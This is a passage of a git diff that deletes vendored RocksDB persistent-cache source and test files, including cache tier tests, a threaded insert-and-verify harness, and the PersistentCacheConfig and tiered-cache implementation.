-  cache_ = NewBlockCache(Env::Default(), path_,
-                         /*size=*/std::numeric_limits<uint64_t>::max(),
-                         /*direct_writes=*/true);
-  RunInsertTest(/*nthreads=*/1, /*max_keys=*/1024);
-
-  cache_ = NewTieredCache(Env::Default(), path_,
-                          /*memory_size=*/static_cast<size_t>(1 * 1024 * 1024));
-  RunInsertTest(/*nthreads=*/1, /*max_keys=*/1024);
-}
-#else
-// Volatile cache tests
-TEST_F(PersistentCacheTierTest, VolatileCacheInsert) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys :
-         {10 * 1024 * kStressFactor, 1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = std::make_shared<VolatileCacheTier>();
-      RunInsertTest(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-TEST_F(PersistentCacheTierTest, VolatileCacheInsertWithEviction) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys : {1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = std::make_shared<VolatileCacheTier>(
-          /*compressed=*/true, /*size=*/static_cast<size_t>(1 * 1024 * 1024 * kStressFactor));
-      RunInsertTestWithEviction(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-// Block cache tests
-TEST_F(PersistentCacheTierTest, BlockCacheInsert) {
-  for (auto direct_writes : {true, false}) {
-    for (auto nthreads : {1, 5}) {
-      for (auto max_keys :
-           {10 * 1024 * kStressFactor, 1 * 1024 * 1024 * kStressFactor}) {
-        cache_ = NewBlockCache(Env::Default(), path_,
-                               /*size=*/std::numeric_limits<uint64_t>::max(),
-                               direct_writes);
-        RunInsertTest(nthreads, static_cast<size_t>(max_keys));
-      }
-    }
-  }
-}
-
-TEST_F(PersistentCacheTierTest, BlockCacheInsertWithEviction) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys : {1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = NewBlockCache(Env::Default(), path_,
-                             /*max_size=*/static_cast<size_t>(200 * 1024 * 1024 * kStressFactor));
-      RunInsertTestWithEviction(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-// Tiered cache tests
-TEST_F(PersistentCacheTierTest, TieredCacheInsert) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys :
-         {10 * 1024 * kStressFactor, 1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = NewTieredCache(Env::Default(), path_,
-                              /*memory_size=*/static_cast<size_t>(1 * 1024 * 1024 * kStressFactor));
-      RunInsertTest(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-// the tests causes a lot of file deletions which Travis limited testing
-// environment cannot handle
-TEST_F(PersistentCacheTierTest, TieredCacheInsertWithEviction) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys : {1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = NewTieredCache(
-          Env::Default(), path_,
-          /*memory_size=*/static_cast<size_t>(1 * 1024 * 1024 * kStressFactor),
-          /*block_cache_size*/ static_cast<size_t>(200 * 1024 * 1024 * kStressFactor));
-      RunInsertTestWithEviction(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-#endif
-
-std::shared_ptr<PersistentCacheTier> MakeVolatileCache(
-    const std::string& /*dbname*/) {
-  return std::make_shared<VolatileCacheTier>();
-}
-
-std::shared_ptr<PersistentCacheTier> MakeBlockCache(const std::string& dbname) {
-  return NewBlockCache(Env::Default(), dbname);
-}
-
-std::shared_ptr<PersistentCacheTier> MakeTieredCache(
-    const std::string& dbname) {
-  const auto memory_size = 1 * 1024 * 1024 * kStressFactor;
-  return NewTieredCache(Env::Default(), dbname, static_cast<size_t>(memory_size));
-}
-
-#ifdef OS_LINUX
-static void UniqueIdCallback(void* arg) {
-  int* result = reinterpret_cast<int*>(arg);
-  if (*result == -1) {
-    *result = 0;
-  }
-
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-}
-#endif
-
-TEST_F(PersistentCacheTierTest, FactoryTest) {
-  for (auto nvm_opt : {true, false}) {
-    ASSERT_FALSE(cache_);
-    auto log = std::make_shared<ConsoleLogger>();
-    std::shared_ptr<PersistentCache> cache;
-    ASSERT_OK(NewPersistentCache(Env::Default(), path_,
-                                 /*size=*/1 * 1024 * 1024 * 1024, log, nvm_opt,
-                                 &cache));
-    ASSERT_TRUE(cache);
-    ASSERT_EQ(cache->Stats().size(), 1);
-    ASSERT_TRUE(cache->Stats()[0].size());
-    cache.reset();
-  }
-}
-
-PersistentCacheDBTest::PersistentCacheDBTest() : DBTestBase("/cache_test") {
-#ifdef OS_LINUX
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("NewRandomAccessFile:O_DIRECT",
-                                                 OnOpenForRead);
-#endif
-}
-
-// test template
-void PersistentCacheDBTest::RunTest(
-    const std::function<std::shared_ptr<PersistentCacheTier>(bool)>& new_pcache,
-    const size_t max_keys = 100 * 1024, const size_t max_usecase = 5) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-
-  // number of insertion interations
-  int num_iter = static_cast<int>(max_keys * kStressFactor);
-
-  for (size_t iter = 0; iter < max_usecase; iter++) {
-    Options options;
-    options.write_buffer_size =
-      static_cast<size_t>(64 * 1024 * kStressFactor);  // small write buffer
-    options.statistics = rocksdb::CreateDBStatistics();
-    options = CurrentOptions(options);
-
-    // setup page cache
-    std::shared_ptr<PersistentCacheTier> pcache;
-    BlockBasedTableOptions table_options;
-    table_options.cache_index_and_filter_blocks = true;
-
-    const size_t size_max = std::numeric_limits<size_t>::max();
-
-    switch (iter) {
-      case 0:
-        // page cache, block cache, no-compressed cache
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = NewLRUCache(size_max);
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 1:
-        // page cache, block cache, compressed cache
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = NewLRUCache(size_max);
-        table_options.block_cache_compressed = NewLRUCache(size_max);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 2:
-        // page cache, block cache, compressed cache + KNoCompression
-        // both block cache and compressed cache, but DB is not compressed
-        // also, make block cache sizes bigger, to trigger block cache hits
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = NewLRUCache(size_max);
-        table_options.block_cache_compressed = NewLRUCache(size_max);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        options.compression = kNoCompression;
-        break;
-      case 3:
-        // page cache, no block cache, no compressed cache
-        pcache = new_pcache(/*is_compressed=*/false);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = nullptr;
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 4:
-        // page cache, no block cache, no compressed cache
-        // Page cache caches compressed blocks
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = nullptr;
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      default:
-        FAIL();
-    }
-
-    std::vector<std::string> values;
-    // insert data
-    Insert(options, table_options, num_iter, &values);
-    // flush all data in cache to device
-    pcache->TEST_Flush();
-    // verify data
-    Verify(num_iter, values);
-
-    auto block_miss = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    auto compressed_block_hit =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT);
-    auto compressed_block_miss =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS);
-    auto page_hit = TestGetTickerCount(options, PERSISTENT_CACHE_HIT);
-    auto page_miss = TestGetTickerCount(options, PERSISTENT_CACHE_MISS);
-
-    // check that we triggered the appropriate code paths in the cache
-    switch (iter) {
-      case 0:
-        // page cache, block cache, no-compressed cache
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(page_hit, 0);
-        ASSERT_GT(block_miss, 0);
-        ASSERT_EQ(compressed_block_miss, 0);
-        ASSERT_EQ(compressed_block_hit, 0);
-        break;
-      case 1:
-        // page cache, block cache, compressed cache
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(block_miss, 0);
-        ASSERT_GT(compressed_block_miss, 0);
-        break;
-      case 2:
-        // page cache, block cache, compressed cache + KNoCompression
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(page_hit, 0);
-        ASSERT_GT(block_miss, 0);
-        ASSERT_GT(compressed_block_miss, 0);
-        // remember kNoCompression
-        ASSERT_EQ(compressed_block_hit, 0);
-        break;
-      case 3:
-      case 4:
-        // page cache, no block cache, no compressed cache
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(page_hit, 0);
-        ASSERT_EQ(compressed_block_hit, 0);
-        ASSERT_EQ(compressed_block_miss, 0);
-        break;
-      default:
-        FAIL();
-    }
-
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-
-    pcache->Close();
-  }
-}
-
-#ifdef TRAVIS
-// Travis is unable to handle the normal version of the tests running out of
-// fds, out of space and timeouts. This is an easier version of the test
-// specifically written for Travis
-TEST_F(PersistentCacheDBTest, BasicTest) {
-  RunTest(std::bind(&MakeBlockCache, dbname_), /*max_keys=*/1024,
-          /*max_usecase=*/1);
-}
-#else
-// test table with block page cache
-TEST_F(PersistentCacheDBTest, BlockCacheTest) {
-  RunTest(std::bind(&MakeBlockCache, dbname_));
-}
-
-// test table with volatile page cache
-TEST_F(PersistentCacheDBTest, VolatileCacheTest) {
-  RunTest(std::bind(&MakeVolatileCache, dbname_));
-}
-
-// test table with tiered page cache
-TEST_F(PersistentCacheDBTest, TieredCacheTest) {
-  RunTest(std::bind(&MakeTieredCache, dbname_));
-}
-#endif
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-#else
-int main() { return 0; }
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.h b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.h
deleted file mode 100644
index 77fd172..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.h
+++ /dev/null
@@ -1,285 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <limits>
-#include <list>
-#include <memory>
-#include <string>
-#include <thread>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "rocksdb/cache.h"
-#include "table/block_builder.h"
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/testharness.h"
-#include "utilities/persistent_cache/volatile_tier_impl.h"
-
-namespace rocksdb {
-
-//
-// Unit tests for testing PersistentCacheTier
-//
-class PersistentCacheTierTest : public testing::Test {
- public:
-  PersistentCacheTierTest();
-  virtual ~PersistentCacheTierTest() {
-    if (cache_) {
-      Status s = cache_->Close();
-      assert(s.ok());
-    }
-  }
-
- protected:
-  // Flush cache
-  void Flush() {
-    if (cache_) {
-      cache_->TEST_Flush();
-    }
-  }
-
-  // create threaded workload
-  template <class T>
-  std::list<port::Thread> SpawnThreads(const size_t n, const T& fn) {
-    std::list<port::Thread> threads;
-    for (size_t i = 0; i < n; i++) {
-      port::Thread th(fn);
-      threads.push_back(std::move(th));
-    }
-    return threads;
-  }
-
-  // Wait for threads to join
-  void Join(std::list<port::Thread>&& threads) {
-    for (auto& th : threads) {
-      th.join();
-    }
-    threads.clear();
-  }
-
-  // Run insert workload in threads
-  void Insert(const size_t nthreads, const size_t max_keys) {
-    key_ = 0;
-    max_keys_ = max_keys;
-    // spawn threads
-    auto fn = std::bind(&PersistentCacheTierTest::InsertImpl, this);
-    auto threads = SpawnThreads(nthreads, fn);
-    // join with threads
-    Join(std::move(threads));
-    // Flush cache
-    Flush();
-  }
-
-  // Run verification on the cache
-  void Verify(const size_t nthreads = 1, const bool eviction_enabled = false) {
-    stats_verify_hits_ = 0;
-    stats_verify_missed_ = 0;
-    key_ = 0;
-    // spawn threads
-    auto fn =
-        std::bind(&PersistentCacheTierTest::VerifyImpl, this, eviction_enabled);
-    auto threads = SpawnThreads(nthreads, fn);
-    // join with threads
-    Join(std::move(threads));
-  }
-
-  // pad 0 to numbers
-  std::string PaddedNumber(const size_t data, const size_t pad_size) {
-    assert(pad_size);
-    char* ret = new char[pad_size];
-    int pos = static_cast<int>(pad_size) - 1;
-    size_t count = 0;
-    size_t t = data;
-    // copy numbers
-    while (t) {
-      count++;
-      ret[pos--] = '0' + t % 10;
-      t = t / 10;
-    }
-    // copy 0s
-    while (pos >= 0) {
-      ret[pos--] = '0';
-    }
-    // post condition
-    assert(count <= pad_size);
-    assert(pos == -1);
-    std::string result(ret, pad_size);
-    delete[] ret;
-    return result;
-  }
-
-  // Insert workload implementation
-  void InsertImpl() {
-    const std::string prefix = "key_prefix_";
-
-    while (true) {
-      size_t i = key_++;
-      if (i >= max_keys_) {
-        break;
-      }
-
-      char data[4 * 1024];
-      memset(data, '0' + (i % 10), sizeof(data));
-      auto k = prefix + PaddedNumber(i, /*count=*/8);
-      Slice key(k);
-      while (true) {
-        Status status = cache_->Insert(key, data, sizeof(data));
-        if (status.ok()) {
-          break;
-        }
-        ASSERT_TRUE(status.IsTryAgain());
-        Env::Default()->SleepForMicroseconds(1 * 1000 * 1000);
-      }
-    }
-  }
-
-  // Verification implementation
-  void VerifyImpl(const bool eviction_enabled = false) {
-    const std::string prefix = "key_prefix_";
-    while (true) {
-      size_t i = key_++;
-      if (i >= max_keys_) {
-        break;
-      }
-
-      char edata[4 * 1024];
-      memset(edata, '0' + (i % 10), sizeof(edata));
-      auto k = prefix + PaddedNumber(i, /*count=*/8);
-      Slice key(k);
-      unique_ptr<char[]> block;
-      size_t block_size;
-
-      if (eviction_enabled) {
-        if (!cache_->Lookup(key, &block, &block_size).ok()) {
-          // assume that the key is evicted
-          stats_verify_missed_++;
-          continue;
-        }
-      }
-
-      ASSERT_OK(cache_->Lookup(key, &block, &block_size));
-      ASSERT_EQ(block_size, sizeof(edata));
-      ASSERT_EQ(memcmp(edata, block.get(), sizeof(edata)), 0);
-      stats_verify_hits_++;
-    }
-  }
-
-  // template for insert test
-  void RunInsertTest(const size_t nthreads, const size_t max_keys) {
-    Insert(nthreads, max_keys);
-    Verify(nthreads);
-    ASSERT_EQ(stats_verify_hits_, max_keys);
-    ASSERT_EQ(stats_verify_missed_, 0);
-
-    cache_->Close();
-    cache_.reset();
-  }
-
-  // template for negative insert test
-  void RunNegativeInsertTest(const size_t nthreads, const size_t max_keys) {
-    Insert(nthreads, max_keys);
-    Verify(nthreads, /*eviction_enabled=*/true);
-    ASSERT_LT(stats_verify_hits_, max_keys);
-    ASSERT_GT(stats_verify_missed_, 0);
-
-    cache_->Close();
-    cache_.reset();
-  }
-
-  // template for insert with eviction test
-  void RunInsertTestWithEviction(const size_t nthreads, const size_t max_keys) {
-    Insert(nthreads, max_keys);
-    Verify(nthreads, /*eviction_enabled=*/true);
-    ASSERT_EQ(stats_verify_hits_ + stats_verify_missed_, max_keys);
-    ASSERT_GT(stats_verify_hits_, 0);
-    ASSERT_GT(stats_verify_missed_, 0);
-
-    cache_->Close();
-    cache_.reset();
-  }
-
-  const std::string path_;
-  shared_ptr<Logger> log_;
-  std::shared_ptr<PersistentCacheTier> cache_;
-  std::atomic<size_t> key_{0};
-  size_t max_keys_ = 0;
-  std::atomic<size_t> stats_verify_hits_{0};
-  std::atomic<size_t> stats_verify_missed_{0};
-};
-
-//
-// RocksDB tests
-//
-class PersistentCacheDBTest : public DBTestBase {
- public:
-  PersistentCacheDBTest();
-
-  static uint64_t TestGetTickerCount(const Options& options,
-                                     Tickers ticker_type) {
-    return static_cast<uint32_t>(
-        options.statistics->getTickerCount(ticker_type));
-  }
-
-  // insert data to table
-  void Insert(const Options& options,
-              const BlockBasedTableOptions& table_options, const int num_iter,
-              std::vector<std::string>* values) {
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // default column family doesn't have block cache
-    Options no_block_cache_opts;
-    no_block_cache_opts.statistics = options.statistics;
-    no_block_cache_opts = CurrentOptions(no_block_cache_opts);
-    BlockBasedTableOptions table_options_no_bc;
-    table_options_no_bc.no_block_cache = true;
-    no_block_cache_opts.table_factory.reset(
-        NewBlockBasedTableFactory(table_options_no_bc));
-    ReopenWithColumnFamilies(
-        {"default", "pikachu"},
-        std::vector<Options>({no_block_cache_opts, options}));
-
-    Random rnd(301);
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    std::string str;
-    for (int i = 0; i < num_iter; i++) {
-      if (i % 4 == 0) {  // high compression ratio
-        str = RandomString(&rnd, 1000);
-      }
-      values->push_back(str);
-      ASSERT_OK(Put(1, Key(i), (*values)[i]));
-    }
-
-    // flush all data from memtable so that reads are from block cache
-    ASSERT_OK(Flush(1));
-  }
-
-  // verify data
-  void Verify(const int num_iter, const std::vector<std::string>& values) {
-    for (int j = 0; j < 2; ++j) {
-      for (int i = 0; i < num_iter; i++) {
-        ASSERT_EQ(Get(1, Key(i)), values[i]);
-      }
-    }
-  }
-
-  // test template
-  void RunTest(const std::function<std::shared_ptr<PersistentCacheTier>(bool)>&
-                   new_pcache,
-               const size_t max_keys, const size_t max_usecase);
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.cc b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.cc
deleted file mode 100644
index 0f500e8..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.cc
+++ /dev/null
@@ -1,168 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-
-#include "inttypes.h"
-
-#include <string>
-#include <sstream>
-
-namespace rocksdb {
-
-std::string PersistentCacheConfig::ToString() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "    path: %s\n", path.c_str());
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    enable_direct_reads: %d\n",
-           enable_direct_reads);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    enable_direct_writes: %d\n",
-           enable_direct_writes);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    cache_size: %" PRIu64 "\n", cache_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    cache_file_size: %" PRIu32 "\n",
-           cache_file_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    writer_qdepth: %" PRIu32 "\n",
-           writer_qdepth);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    pipeline_writes: %d\n", pipeline_writes);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize,
-           "    max_write_pipeline_backlog_size: %" PRIu64 "\n",
-           max_write_pipeline_backlog_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    write_buffer_size: %" PRIu32 "\n",
-           write_buffer_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    writer_dispatch_size: %" PRIu64 "\n",
-           writer_dispatch_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    is_compressed: %d\n", is_compressed);
-  ret.append(buffer);
-
-  return ret;
-}
-
-//
-// PersistentCacheTier implementation
-//
-Status PersistentCacheTier::Open() {
-  if (next_tier_) {
-    return next_tier_->Open();
-  }
-  return Status::OK();
-}
-
-Status PersistentCacheTier::Close() {
-  if (next_tier_) {
-    return next_tier_->Close();
-  }
-  return Status::OK();
-}
-
-bool PersistentCacheTier::Reserve(const size_t size) {
-  // default implementation is a pass through
-  return true;
-}
-
-bool PersistentCacheTier::Erase(const Slice& key) {
-  // default implementation is a pass through since not all cache tiers might
-  // support erase
-  return true;
-}
-
-std::string PersistentCacheTier::PrintStats() {
-  std::ostringstream os;
-  for (auto tier_stats : Stats()) {
-    os << "---- next tier -----" << std::endl;
-    for (auto stat : tier_stats) {
-      os << stat.first << ": " << stat.second << std::endl;
-    }
-  }
-  return os.str();
-}
-
-PersistentCache::StatsType PersistentCacheTier::Stats() {
-  if (next_tier_) {
-    return next_tier_->Stats();
-  }
-  return PersistentCache::StatsType{};
-}
-
-//
-// PersistentTieredCache implementation
-//
-PersistentTieredCache::~PersistentTieredCache() { assert(tiers_.empty()); }
-
-Status PersistentTieredCache::Open() {
-  assert(!tiers_.empty());
-  return tiers_.front()->Open();
-}
-
-Status PersistentTieredCache::Close() {
-  assert(!tiers_.empty());
-  Status status = tiers_.front()->Close();
-  if (status.ok()) {
-    tiers_.clear();
-  }
-  return status;
-}
-
-bool PersistentTieredCache::Erase(const Slice& key) {
-  assert(!tiers_.empty());
-  return tiers_.front()->Erase(key);
-}
-
-PersistentCache::StatsType PersistentTieredCache::Stats() {
-  assert(!tiers_.empty());
-  return tiers_.front()->Stats();
-}
-
-std::string PersistentTieredCache::PrintStats() {
-  assert(!tiers_.empty());
-  return tiers_.front()->PrintStats();
-}
-
-Status PersistentTieredCache::Insert(const Slice& page_key, const char* data,
-                                     const size_t size) {
-  assert(!tiers_.empty());
-  return tiers_.front()->Insert(page_key, data, size);
-}
-
-Status PersistentTieredCache::Lookup(const Slice& page_key,
-                                     std::unique_ptr<char[]>* data,
-                                     size_t* size) {
-  assert(!tiers_.empty());
-  return tiers_.front()->Lookup(page_key, data, size);
-}
-
-void PersistentTieredCache::AddTier(const Tier& tier) {
-  if (!tiers_.empty()) {
-    tiers_.back()->set_next_tier(tier);
-  }
-  tiers_.push_back(tier);
-}
-
-bool PersistentTieredCache::IsCompressed() {
-  assert(tiers_.size());
-  return tiers_.front()->IsCompressed();
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.h b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.h
deleted file mode 100644
index 25e0b3c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.h
+++ /dev/null
@@ -1,336 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <limits>
-#include <list>
-#include <map>
-#include <string>
-#include <vector>
-
-#include "monitoring/histogram.h"
-#include "rocksdb/env.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/status.h"
-
-// Persistent Cache
-//
-// Persistent cache is tiered key-value cache that can use persistent medium. It
-// is a generic design and can leverage any storage medium -- disk/SSD/NVM/RAM.
-// The code has been kept generic but significant benchmark/design/development
-// time has been spent to make sure the cache performs appropriately for
-// respective storage medium.
-// The file defines
-// PersistentCacheTier    : Implementation that handles individual cache tier
-// PersistentTieresCache  : Implementation that handles all tiers as a logical
-//                          unit
-//
-// PersistentTieredCache architecture:
-// +--------------------------+ PersistentCacheTier that handles multiple tiers
-// | +----------------+       |
-// | | RAM            | PersistentCacheTier that handles RAM (VolatileCacheImpl)
-// | +----------------+       |
-// |   | next                 |
-// |   v                      |
-// | +----------------+       |
-// | | NVM            | PersistentCacheTier implementation that handles NVM
-// | +----------------+ (BlockCacheImpl)
-// |   | next                 |
-// |   V                      |
-// | +----------------+       |
-// | | LE-SSD         | PersistentCacheTier implementation that handles LE-SSD
-// | +----------------+ (BlockCacheImpl)
-// |   |                      |
-// |   V                      |
-// |  null                    |
-// +--------------------------+
-//               |
-//               V
-//              null
-namespace rocksdb {
-
-// Persistent Cache Config
-//
-// This struct captures all the options that are used to configure persistent
-// cache. Some of the terminologies used in naming the options are
-//
-// dispatch size :
-// This is the size in which IO is dispatched to the device
-//
-// write buffer size :
-// This is the size of an individual write buffer size. Write buffers are
-// grouped to form buffered file.
-//
-// cache size :
-// This is the logical maximum for the cache size
-//
-// qdepth :
-// This is the max number of IOs that can issues to the device in parallel
-//
-// pepeling :
-// The writer code path follows pipelined architecture, which means the
-// operations are handed off from one stage to another
-//
-// pipelining backlog size :
-// With the pipelined architecture, there can always be backlogging of ops in
-// pipeline queues. This is the maximum backlog size after which ops are dropped
-// from queue
-struct PersistentCacheConfig {
-  explicit PersistentCacheConfig(
-      Env* const _env, const std::string& _path, const uint64_t _cache_size,
-      const std::shared_ptr<Logger>& _log,
-      const uint32_t _write_buffer_size = 1 * 1024 * 1024 /*1MB*/) {
-    env = _env;
-    path = _path;
-    log = _log;
-    cache_size = _cache_size;
-    writer_dispatch_size = write_buffer_size = _write_buffer_size;
-  }
-
-  //
-  // Validate the settings. Our intentions are to catch erroneous settings ahead
-  // of time instead going violating invariants or causing dead locks.
-  //
-  Status ValidateSettings() const {
-    // (1) check pre-conditions for variables
-    if (!env || path.empty()) {
-      return Status::InvalidArgument("empty or null args");
-    }
-
-    // (2) assert size related invariants
-    // - cache size cannot be less than cache file size
-    // - individual write buffer size cannot be greater than cache file size
-    // - total write buffer size cannot be less than 2X cache file size
-    if (cache_size < cache_file_size || write_buffer_size >= cache_file_size ||
-        write_buffer_size * write_buffer_count() < 2 * cache_file_size) {
-      return Status::InvalidArgument("invalid cache size");
-    }
-
-    // (2) check writer settings
-    // - Queue depth cannot be 0
-    // - writer_dispatch_size cannot be greater than writer_buffer_size
-    // - dispatch size and buffer size need to be aligned
-    if (!writer_qdepth || writer_dispatch_size > write_buffer_size ||
-        write_buffer_size % writer_dispatch_size) {
-      return Status::InvalidArgument("invalid writer settings");
-    }
-
-    return Status::OK();
-  }
-
-  //
-  // Env abstraction to use for systmer level operations
-  //
-  Env* env;
-
-  //
-  // Path for the block cache where blocks are persisted
-  //
-  std::string path;
-
-  //
-  // Log handle for logging messages
-  //
-  std::shared_ptr<Logger> log;
-
-  //
-  // Enable direct IO for reading
-  //
-  bool enable_direct_reads = true;
-
-  //
-  // Enable direct IO for writing
-  //
-  bool enable_direct_writes = false;
-
-  //
-  // Logical cache size
-  //
-  uint64_t cache_size = std::numeric_limits<uint64_t>::max();
-
-  // cache-file-size
-  //
-  // Cache consists of multiples of small files. This parameter defines the
-  // size of an individual cache file
-  //
-  // default: 1M
-  uint32_t cache_file_size = 100ULL * 1024 * 1024;
-
-  // writer-qdepth
-  //
-  // The writers can issues IO to the devices in parallel. This parameter
-  // controls the max number if IOs that can issues in parallel to the block
-  // device
-  //
-  // default :1
-  uint32_t writer_qdepth = 1;
-
-  // pipeline-writes
-  //
-  // The write optionally follow pipelined architecture. This helps
-  // avoid regression in the eviction code path of the primary tier. This
-  // parameter defines if pipelining is enabled or disabled
-  //
-  // default: true
-  bool pipeline_writes = true;
-
-  // max-write-pipeline-backlog-size
-  //
-  // Max pipeline buffer size. This is the maximum backlog we can accumulate
-  // while waiting for writes. After the limit, new ops will be dropped.
-  //
-  // Default: 1GiB
-  uint64_t max_write_pipeline_backlog_size = 1ULL * 1024 * 1024 * 1024;
-
-  // write-buffer-size
-  //
-  // This is the size in which buffer slabs are allocated.
-  //
-  // Default: 1M
-  uint32_t write_buffer_size = 1ULL * 1024 * 1024;
-
-  // write-buffer-count
-  //
-  // This is the total number of buffer slabs. This is calculated as a factor of
-  // file size in order to avoid dead lock.
-  size_t write_buffer_count() const {
-    assert(write_buffer_size);
-    return static_cast<size_t>((writer_qdepth + 1.2) * cache_file_size /
-                               write_buffer_size);
-  }
-
-  // writer-dispatch-size
-  //
-  // The writer thread will dispatch the IO at the specified IO size
-  //
-  // default: 1M
-  uint64_t writer_dispatch_size = 1ULL * 1024 * 1024;
-
-  // is_compressed
-  //
-  // This option determines if the cache will run in compressed mode or
-  // uncompressed mode
-  bool is_compressed = true;
-
-  PersistentCacheConfig MakePersistentCacheConfig(
-      const std::string& path, const uint64_t size,
-      const std::shared_ptr<Logger>& log);
-
-  std::string ToString() const;
-};
-
-// Persistent Cache Tier
-//
-// This a logical abstraction that defines a tier of the persistent cache. Tiers
-// can be stacked over one another. PersistentCahe provides the basic definition
-// for accessing/storing in the cache. PersistentCacheTier extends the interface
-// to enable management and stacking of tiers.
-class PersistentCacheTier : public PersistentCache {
- public:
-  typedef std::shared_ptr<PersistentCacheTier> Tier;
-
-  virtual ~PersistentCacheTier() {}
-
-  // Open the persistent cache tier
-  virtual Status Open();
-
-  // Close the persistent cache tier
-  virtual Status Close();
-
-  // Reserve space up to 'size' bytes
-  virtual bool Reserve(const size_t size);
-
-  // Erase a key from the cache
-  virtual bool Erase(const Slice& key);
-
-  // Print stats to string recursively
-  virtual std::string PrintStats();
-
